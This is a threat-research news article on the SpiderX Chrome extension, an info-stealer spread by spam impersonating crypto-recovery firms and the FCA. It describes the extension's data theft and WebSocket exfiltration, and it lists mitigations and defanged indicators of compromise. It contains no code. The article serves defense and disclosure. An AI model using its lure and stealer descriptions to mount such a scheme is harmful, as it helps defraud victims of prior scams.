A crude malicious Chrome extension for stealing personal data and crypto can slip through malware detection systems, despite its simplicity. This significant leak provides unique insights into the effectiveness of malicious campaigns and the limitations of current spam and malware detection systems.
The data storage and search tool is used for campaign logging, contains critical operational data, and harvests personal information from hundreds of victims. The malicious actor, believed to be based in Israel, defrauds hundreds of people per month. The criminal scheme was exposed after the perpetrator left an open Elasticsearch instance.
The Cybernews research team discovered the instance and uncovered the malicious operation behind it.
The threat actor developed a simple information stealer in the form of a browser extension on Chrome Web Store called SpiderX. Despite obvious malicious intent, it has not yet been detected by antivirus software.
SpiderX is capable of gathering plaintext login information, taking screenshots, and tracking browsing history. The threat actor created an infrastructure containing dozens of malicious internet addresses and WhatsApp accounts to lure victims into downloading the extension.
“Despite amateurish execution and carelessness, the threat actor is sending tens of thousands of spam emails per month and has an infection rate of 1%. At the time of discovery, there were over 500 infected victims, and the campaign is still ongoing,” Cybernews researchers said.
However, it seems like the developer was not careful and even exposed their own personal details, which were used to test the malicious infrastructure, leading to a person in Israel.
The social engineering campaign targets crypto users
SpiderX campaign masquerades as various companies or even institutions specializing in crypto asset recovery. The goal of the financially motivated threat actor is to drain the victim’s cryptocurrency wallets.
The scheme starts by sending spam from domains impersonating cryptocurrency recovery agencies, trading platforms, wallets, or even the Financial Conduct Authority, using sites like claimyourrefund[.]net, fca-recovery[.]org, spiderx[.]co, and many others (see the full list below).
“The spam messages claim that they can help you recover stolen or lost crypto assets or unfreeze frozen accounts associated with unregistered crypto trading services. They often target victims who already have suffered in previous crypto scams and are likely to pay even more,” Cybernews researchers said.
The subject lines of spam emails attempted to create a sense of urgency or a personal touch. Examples include 'Urgent: Follow-up on Your Refund Procedure' and 'Martin from AI-B Security.'
If the victim replies to the attackers, showing interest in these services, the threat actor directs them to download malware to proceed with the ‘recovery’ process. SpiderX pretends to be a cryptocurrency wallet.
Some variations of the spam messages and websites used in the malicious campaign directed users to contact the threat actor via WhatsApp, while others directed them to download Chrome extensions and install them manually. Not all malicious browser extensions were published in the Chrome extension store.
At the time of the discovery, the malicious campaign had been running for 45 days, and spam emails had reached over 52 thousand unique recipients. It was still active, continuously spreading more spam emails and infecting new victims.
The SpiderX info has no obfuscation
Once a malicious Chrome extension is installed, it takes screenshots of the victim’s screen, gathers plaintext login information from forms on various websites, and exfiltrates the browsing history.
In the description on Chrome Web Store, the threat actor declares that the extension collects browsing history and data “to analyze it for malicious code.” The extension has zero reviews and the declared developer is fake.
In the background, the extension establishes connections with a WebSocket server (wssService) spiderx[.]co/ws.
Unlike traditional one-way HTTP requests, this enables real-time bidirectional communication between a web browser and a server. The code interacts with Chrome tabs through the chrome.tabs API, takes screenshots every second, and sends collections, browsing history, and forms data to the server.
The malware also listens for various Chrome events related to tabs, such as when they are activated, updated, or removed. It is also capable of injecting scripts into web pages.
The malicious actor used “Umbraco,” a popular open-source content management system, for Command and Control (C2) and exfiltration.
“If SpiderX has been running for a while, no credentials stored on the affected machine should be trusted,” the researchers warn.
“Interestingly, none of the malware detection vendors available on VirusTotal detected the extension as malicious, even though, during static code analysis, it was clear that the application collects information from websites and sends it to a remote server. All its logic and used methods weren’t obfuscated,” Cybernews researchers said.
It wasn’t flagged as malicious by the Chrome Extension Store, either.
Further analysis revealed that the infrastructure for this campaign was spread out over multiple jurisdictions, mainly China, the US, and Europe. This is likely to complicate potential law enforcement investigations.
The infrastructure also heavily relied on legitimate Cloudflare infrastructure to hide the locations of most of the servers used in the campaign. The domains were also hosted on legitimate cloud providers.
Cybernews has already reported on how easy it is to craft a malicious Chrome extension and steal private information.
Poor operational security exposes the hacker
The malicious campaign was identified due to the lack of operational security measures and software misconfigurations.
“It appears that before launching the campaign, the threat actor set up and tested the infrastructure using their email, IP address, and other personal information,” our researchers said. “This data leads to a person in Israel.”
The Cybernews research team found a corresponding account on an “Umbraco” developers forum and social media accounts.
“Among the leaked emails, we discovered that the developer behind SpiderX communicated with other threat actors in an attempt to buy fake reviews for the malicious extension. Hundreds of appeal emails were also sent to Spamhaus, an organization that tracks spam and malware on the internet, which flagged some of their malicious domains,” the researchers said.
Mitigation requires changing all passwords
If your machine gets compromised with SpiderX malware, the Cybernews researchers recommend the following steps:
- Remove the malicious extension from the compromised system and ensure it’s not present on other machines with synced Chrome accounts.
- Terminate all the active sessions on important accounts from Google, Meta, and other service providers using their corresponding support pages.
- Using a secure system, change all of the passwords that were ever entered and saved on the machine, prioritizing the most sensitive accounts, such as financial accounts and crypto exchange accounts. Transfer any remaining Cryptocurrency assets to a new wallet.
- Back up any important or sensitive files. Wipe any and all data from the compromised machine and reinstall the operating system.
- Evaluate any potential damages made via unauthorized asset transfers and seek support from relevant providers to check if any protections are available for reversing fraudulent transactions.
- Sign up for a credit monitoring service to see if your information was used to take out loans or create any new accounts for banks or cryptocurrency exchanges.
“The threat actor made multiple mistakes, and the malicious intents of the code couldn’t be more obvious. Yet, they still managed to compromise hundreds of people despite only sending a relatively small amount of spam emails. That could quickly be scaled up to thousands and even millions,” the researchers warned.
All the information accessed by the Cybernews research team was used solely for research purposes, and only anonymized samples were collected to analyze the scope of the malicious campaign.
Indicators of compromise
The hash of the malicious SpiderX extension:
441274c48b1fdb869c4a0ebee070562eff724827fdd128f033d12b16cd7d3f2f
Domains involved in the malicious campaign at the time of the investigation:
- spiderx[.]co
- cf-blockchain[.]com
- chain-ai-security[.]com
- infinitrade[.]co
- aiblocksecurity[.]com
- claimyourrefund[.]net
- wow-wallet[.]com
- tandem-markets[.]com
- igc-markets[.]com
- atmos-wallet[.]com
- spider-wallet[.]com
- fca-recovery[.]org
- fca-uk[.]eu
- liberty-wallet[.]com
- funds-ca[.]org
Your email address will not be published. Required fields are markedmarked